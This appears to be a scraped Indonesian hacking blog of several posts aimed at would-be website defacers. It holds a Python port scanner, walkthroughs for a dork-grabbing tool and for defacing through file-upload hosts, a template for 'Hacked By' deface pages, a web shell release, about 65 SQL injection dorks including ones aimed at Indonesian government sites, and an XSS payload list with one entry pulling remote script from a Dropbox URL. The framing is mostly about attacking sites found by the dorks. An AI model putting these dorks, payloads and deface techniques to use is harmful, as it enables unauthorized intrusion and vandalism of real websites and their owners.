Cara Membuat Tools Port Scanner Sendiri Dengan Python

 

Cara Membuat Tools Port Scanner Sendiri Dengan Python


Nelo.F4 - Cara membuat tools sederhana sendiri. Oke sekarang saya akan memberikan tutorial cara membuat tools port scanner sendiri dengan bahasa pemrograman python2, banyak yang belum tahu bahwa tools port scanner ini sangan penting di dunia deface ataupun dunia hacking. seberapa pentingnya port scanner ini? umumnya mereka lansung memakai exploit atau autoexploiter yang ada pada aplikasi web, sedangkan untuk masuk ke aplikasi web tidak harus memaikai exploit atau webapp alias HTTP/HTTPS,  bisa saja kalian sudah memakan waktu banyak untuk memakai autoexploiter atau exploit dan bodohnya SSH/FTP pada web server terbuka dan tidak memakai password wah. sekian cepaka cepikinya lanjute ke pembahasanya.


Oke sekarang waktunya kita ngodinga atau menjinakan ular python versi 2 !
lihat dan tiru code python dibawah ini.

#!usr/bin/python

import socket
# tambahkan banner jika kalian mau.
def scan():
    server = raw_input(' Masukan alamat server: ')
    ip = socket.gethostbyname(server)
    print " Alamat IP server pada",ip
    for port in range(1,1000):
        konak = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        hasilnya = konak.connect_ex((ip,port))
        if hasilnya == 0:
            print "Port terbuka pada : [{}]".format(port)
        konak.close()
scan()
Paham di hayati code diatas ini. kalian mungkin membutuhkan sedikit kegrilyaan untuk memahaminya, bagi yang sudah mahir dalam TCP/IP sudah tidak asing lagi dengan code diatas ini. mari kita bahas

Code diatas menggunakan library socket untuk mengscan port open atau tidaknya, 

Alamat server disimpan pada var server kemudian IP server di cari atau di scan dengan
socket.gethostnameby() dan disimpan kedalam var IP

Untuk perulangan for itu berfungsi sebagain checker port dengan range 1-1000 ( kalian bisa ubah rangenya sesuai kebutuhan kalian.)

Next var konak dan hasilnya membangun atau membuat koneksi.

Statement if hasilnya == 0: dalam bahasa sederhananya yang artinya, tidak ada jawaban koneksi atau port itu terbuka. kemudian port tersebut memprint ke layar terminal kalian masing-masing untuk memberitahu ke user/pengguna.

Maka Hasilnya akan seperti gambar dibawah ini


Dan resource codenya kurang lebih seperti ini 



Bagaimana? cukup simple bukan?  hehe

oke sekian dari saya Nelo.F4, Jika ada pertanyaan bisa chat ke fanspage facebook Explosionsquadcyber

Thanks To God
All Member ESC

HAVE A NICE DAY! - NELO.F4

THERE A PROBLEM? GOOGLE YOUR FRIEND!

TOOLS HACKTAE | HACKTAE BING DORKER

TOOLS HACKTAE | HACKTAE BING DORKER

Nelo.F4 - Tools HACKTAE Bing Dorker ini adalah salah satu tools yang berfungsing grab atau mendapatkan list web yang kita ingin eksekusi. perantaranya seperti ini, jika kalian ngedork di google butuh waktu berjam" untuk mendapatkan 100 site nah jika kalian mengggunakan tools ini hanya dengan 1 sampe 3 menit saja kalian sudah bisa mendapatkan result 100 website bahkan lebih. wahhhh syudah langsung kita terjun ke pembahasanya saja.


Pertama kalian harus mempunyai terminal entah itu termux / cmd atau terminal di distro linux. jika kalian belum menginstallnya coba cek artikel tentang linux atau termux di website ini.

Kedua jika kalian sudah menginstallnya maka lakukanlah perintah seperti di bawah ini 
$ apt get update && apt get upgrade 
tunggu prosses hinggal selesai
Jika kalian sudah melakukan update dan upgrade pada terminal kalian masing-masing maka hal ketiga yang harus kita lakukan adalah menginstall pyhton2 (lihat dan tiru perintah di bawah pada teminal kalian masing-masing)
 
$ pkg install python2 
 Tunggu hingga proses selesai. jika sudah selesai kita lanjut ke langkah berikutnya, langkah keempat adalah menginstall git untuk mengclone repository dari github.(lihat dan tiru perintah di bawah pada terminal kalian masing-masing)
$ pkg install git
 Nah langkah keempat sudah selesai maka yang harus kita lakukan sekarang adalah mengclone atau bahasa sederhananya mendownload repository atau toolsnya

$ git clone https://github.com/NeloF4/hacktaedork.git

 yap cloning sudah selesai, saatnya kita running tools tersebut dengan perintah. 
$ cd hacktaedork
$ python2 hacktae.pyc
 Maka tampilan tools tersebut akan seperti ini 

 Sekarang tugas kalian adalah input atau memasukan dork di dalam perintah GIVE ME YOUR DORK :: 
EXAMPLE: GIVE ME YOUR DORK :: inurl:details.php?id= site:.com
Nah jika sudah maka akan muncul pertanyaan NUMBER OF PAGES TO LOOK FOR :: (MASUKAN ANGKA SESUKA HATI KALIAN, KALO MIMIN SI MAX10 ATAU 30 KEBAWAH) Lalu tekan enter. hasilnya akan seperti gambar di bawah ini.


Disitu terlihat bahwa muncul tulisan [D0N3] SAVED AS RESULT16.txt. sekarang tugas kalian adalah membuka result tersebut dan mulailah eksekusi website yang ada di dalam result terserbut.

NOTE!: JIKA DORK KALIAN AMPUH MAKA RESULT YANG KALIAN DAPAT BISA LEBIH BANYAK

THANKS TO W3W3W3

HAVE A NICE DAY! - NELO.F4

THERE A PROBLEM? GOOGLE YOUR FRIEND!

Cara Membuat Scritp Deface Sederhana Tapi Keren

Cara Membuat Scritp Deface Sederhana Tapi Keren 

ImamKun.Hello gays kembali lagi bersama gua imamkun di artikel kali ini gua akan membahas tentang bagaimana caranya membuat script deface sederhana tapi keren mungkin dari kalian pernah bingung gimana buat script deface sederhana tapi keren bahkan kalian sampai mengambil script deface orang tampa sepengetahuannya oke kita langsung saja mulai ke intinya simak tutorial dibawah ini ya bujank
  • Buka Notepad Atau alat yang bisa buat ngedit coddingannya
 <html>
<head>
    <title>Page Title</title>
</head>
<body>

<h1>This is a Heading</h1>
<p>This is a paragraph.</p>

</body>
</html> 
  • Selanjutnya kita membuat judul tittlenya 
<HTML>
<head>
<title>Hacked By ImamKun</title>
</head>
<body>

</body>
</HTML> 
  •  Jika backgroundnya ingin dikasih gambar kita tinggal tambahkan / edit di bagian <body>
<html>
<head>
    <title>Hacked By ImamKun</title>
</head>
<body bgcolor="link gambar yg mau kalian jadiin background">

<h1>This is a Heading</h1>
<p>This is a paragraph.</p>

</body>
</html>
  • Sekarang kata kata yang ingin kalian tulis 
<html>
<head>
    <title>Hacked By ImamKun</title>
</head>
<body bgcolor="link gambar yg mau kalian jadiin background">

<h1>kata kata yang lu pengen</h1>
<p>nah disini masukin surat cinta kalian</p>

</body>
</html>
  •  Kalo surat cinta kalian terlalu panjang bisa ditambahkan <p>kata-katanya</p>
<html>
<head>
    <title>
Hacked By ImamKun</title>
</head>
<body bgcolor="link gambar yg mau kalian jadiin background">

<h1>kata kata bucin lu :V</h1>
<p>nah disini masukin surat cinta kalian</p>
<p> hanya contoh</p>
</body>
</html>
 Cukup sekian tutorial dari saya mohon maaf bila ada kesalahan. Jangan lupa share ke teman-teman kalian biar mereka pada tau

DEFACE HOST FILE UPLOADER UNTUK PEMULA

DEFACE HOST FILE UPLOADER UNTUK PEMULA 

Nelo.F4 -  Cara DEFACE HOST FILE UPLOADER ini termasuk dalam kategori easy sangad. tapi ada 1 keresahan, yaitu hanya bisa upload file ber extensi HTML atau ZIP hehehe maka dari itu mimin kategorikan sebagai methode deface untuk pemula karna tidak ada unsur hack"an atau eksekusi"an wkwkw langsung saja ke pembahasan.


Bahan-bahan:
  • Dork: host file uploader
  • Internet/Inet
  • PC/Android
syudah siap semua? gasken mank :v

 NOTE: BAGI YANG DARURAT MEMBACA BISA TONTON VIDIO BERIKUT.

Pertama kalian buka aplikasi browser kalian masing-masing.
copy paste dork diatas lalu tempelkan pada kontak search google. Hasilnya liat gambar dibawah


Jika sudah seperti gambar diatas ini. pilih salah satu website yang memungkinkan.
Disini mimin memilih Web https://www.file.io/ 

Tampilan https://www.file.io seperti diatas, Pijit atau Pencet Tombol upload 
Disini kalian hanya bisa upload script deface berextensi HTML! jikalau kalian mau upload shell backdoor silahkan jika mumpuni!
Next, jika kalian suda upload pasti akan muncul link dimana sc/script deface kalian berada. liat gambar dibawah 

Nah tinggal buka New tab di browser kalian masing-masing atau bisa juga pijit link yang muncul.

dan hasilnya? TEDEPES GAN! WOKWOWK


udah segitu aja ya. ini merupakan langkah langkang terbaik untuk  menjadi seorang defacer atau heker (hacker) wkwk. kurang lebihnya mohon di maafkan

GOODLUCK! HAVE A NICE DAY - NELO,F4THERE A PROBLEM? GOOGLE YOUR FRIEND!

(RELEASE) ImamKun Mini Shell

(RELEASE) ImamKun Mini Shell

Hello gays kembali lagi bersama gua explosionsquadcyber di artikel kali ini gua tidak memberikan tutorial hacking dahulu di artikel gua kali ini akan membagikan minishell yang sederhana tanpa fitur yang dibuat oleh imamkun jika kalian penasaran langsung saja download via pastebin atau media fire

 Untuk download via mediafirenya disini Mungkin cukup sekian dari admin " (RELEASE) ImamKun Mini Shell "

DORK SQLI FRESH 2019

DORK SQLI FRESH 2019

Nelo.F4 - Terkadang Dork menjadi senjata ampuh bagi para defacer deface masa kini.
tapi bukan hal yang biasa mencari kelemahan website tanpa dork. itu yang disebut orang" mandiri (TANPA DORK!) yap lanjut ke pembahasan. di hari yang cerah ini mimin akan share Dork SQLI FRESH 2019, btw ini dork racikan mimin dewek ya :) kalian kan enak tinggal ngedorking lalu ekse -_- langsung aja terjun ke pembahasan gapake banyak bacot.


Note: JANGAN BERGANTUNG SAMA DORKNYA. BERGANTUNGLAH SAMA OTAK DAN AKAL KALIAN!

Dork:
1. inurl:/module/News.php?cid=
2. inurl:/banner.php?id= Cid
3. inurl:/manage-news.php?id=
4. inurl:/gallery.php?id=
5. inurl:/videos.php?id=
6. inurl:/Products.php?id= Site:in "delhi"
7. inurl:/module/berita.php?id=
8. inurl:/hal=berita?id=
9. inurl:/Detil.php?id=
10. inurl:/prod.php?id=
11. inurl:/staff.php?id=
12. inurl/profile_view.php?id=
13. inurl:/s.php?id=
14. inurl:/interviews.php?do=view&id
15. inurl:/berita.php?id=4
16. inurl:?menu=02&id=14¬icia=
17. inurl:/view.php?id=
18. inurl:/media.php?module=detailproduk&id=
19. inurl:/module=detailproduk&id=
20. inurl:/content&author?id=
21. inurl:/articletext&asset=
22. inurl:/media&view=
23. inurl:/post?id=published
24. inurl:/product/brand_id=
25. inurl:/products/product.php?id=
26. inurl:/about.php?cid=
27. inurl:/feed_bunner?id=
29. inurl:/informasi_detail.php?id=
30. inurl:/author.php?id=
31. inurl:/post.php?id=
32. inurl:/Topic.php?id=
33. inurl:/categorias.php?id=
34. inurl:/show-post.php?id=
35. inurl:/news/post.php?id=
35. inurl:clubpage.php?id=
36. inurl:memberInfo.php?id=
37. inurl:section.php?id=
38. inurl:theme.php?id=
39. inurl:news-full.php?id=
40. inurl:transcript.php?id=
41. inurl:/eventsandnews.php?id=
42. inurl:/full_content.php?article_id=
43. inurl:/blog.php?id=
44. inurl:/main?module=home
45. inurl:/Catalog.aspx?id_group=
46. inurl:/about.php?id=
47. inurl:/Newsleter.php?id=
48. inurl:/stats.php?id=
49. inurl:/artikel.php?cat_id=
50. inurl:hal=detail_artikel.php?id
51. inurl:detail_berita.php?id= site:.com
52. inurl:product_detail.php?id= 
53. inurl:blog_post.php?id= 
54. inurl:detail_berita.php?id=
55. inurl:tentang_kami.php?id=
56. inurl:hukum.php?id= site:go.id
57. inurl:kategori.php?id= site:go.id
58. inurl:berita.php?id= site:go.id
59. inurl:event.php?id= site:go.id
60. inurl:pengumuman.php?id= site:go.id
61. inurl:Category.php?id= site:us
62. inurl:shipped.php?id= site:us
63. site:us inurl:view cart.php?id=
64. site:us inurl:Smartphones.php?id=
65. site:us inurl:School.php?id=

BAGI YANG GABIS COPAS BISA KE PASTEBIN
DISINI LINKNYA : https://pastebin.com/raw/vZZzTZ0y

GOODLUCK! HAVE A NICE DAY - NELO.F4

THERE A PROBLEM? GOOGLE YOUR FRIEND!

Tools ScanQLi | Scanner SQL Injection Vulnerability

Tools ScanQLi | Scanner SQL Injection Vulnerability

 Nelo.F4 - ScanQLi adalah pemindai injeksi SQL sederhana dengan beberapa fitur tambahan. Alat ini tidak dapat mengeksploitasi SQLi, hanya mendeteksi mereka. (Tested on Debian 9) 

Features
  • Classic
  • Blind
  • Time based
  • GBK (soon)
  • Recursive scan (follow all hrefs of the scanned web site)
  • Cookies integration
  • Adjustable wait delay between requests
  • Ignore given URLs

installation

1. Install git tools   
  • $ apt update
  • $ apt install git
2. Clone Repo
  • $ git clone https://github.com/bambish/ScanQLi
3. Install python required libs
  • $ apt install python-pip
  • $ cd ScanQLi
  • $ pip install -r requirements.txt
  • NOTE: for python 3 please install python3-pip and use pip3

Usage
  • $ python scanqli -u [URL] [OPTIONS]
Example

Simple URL scan with output file:
$ python scanqli.py -u 'http://127.0.0.1/test/?p=news' -o output.log

Recursive URL scanning with cookies:

$ python scanqli.py -u 'https://127.0.0.1/test/' -r -c '{"PHPSESSID":"4bn7uro8qq62ol4o667bejbqo3" , "Session":"Mzo6YWMwZGRmOWU2NWQ1N2I2YTU2YjI0NTMzODZjZDVkYjU="}'

Warning
ScanQLi was created to perform pentest or others legal stuffs (like bug bounty). Using ScanQLi against web site without authorization is forbidden.

I'm not responsible of your usage of ScanQLi. At your own risk


Author by bambish 
Thanks to bambish - kitploit 

GOODLUCK! HAVE A NICE DAY - NELO.F4.

THERE A PROBLEM? GOOGLE YOUR FRIENDS!

99+ XSS Payload List 2019

99+ XSS Payload List 2019

 Nelo.F4 - Apa itu XSS? XSS merupakan singkatan dari istilah CROSS SITE SCRIPTING.
XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya. Di Indonesia Methode XSS ini sudah tidak asing lagi bagi para deface atau juga para white hat atau bug hunter. dan si pembahasan kali ini Nelo akan memberikan 99+ XSS Payload list 2019. yap langsung saja next ke Payloadnya.


INI CONTOH PAYLOADNYA. JIKA KALIAN BERTANYA KO DIKIT? DIJUDUL 99+? SCROLL KE BAWAH, PENCET LINK REDIRECT KE PASTEBIN. DIKARNAKAN JIKALAU MIMIN SHARE SEMUA PAYLOAD LISTNYA DISINI BAKAL JADI PANJANG BUKAN MAIN.

<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script>
“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
‘; alert(1);
‘)alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(‘XSS’)>
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert(‘XSS’)>     
<img src=xss onerror=alert(1)>
<iframe src="&Tab;javascript:prompt(1)&Tab;">
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
<img/src=`` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=``&NewLine; onerror=alert(1)&NewLine;

<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

<script /**/>/**/alert(1)/**/</script /**/

&#34;&#62;<h1/onmouseover='\u0061lert(1)'>

<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">


CONTOH DIATAS HANYALAH SEBAGAI CONTOH. 
JIKA KALIAN INGIN PAYLOAD LEBIH BISA KE LINK INI 
99+ XSS PAYLOAD LIST 2019 DISINI
99+ XSS PAYLOAD LIST 2019 (2) DISINI   





Semoga kalian bisa menjadi bughunter yang hebat hehe. menjaga bangsa ini dari defacer" jahad itu wkwkw.

GOOD LUCK! HAVE A NICE DAY - NELO.F4.

THERE A PROBLEM? GOOGLE YOUR FRIENDS !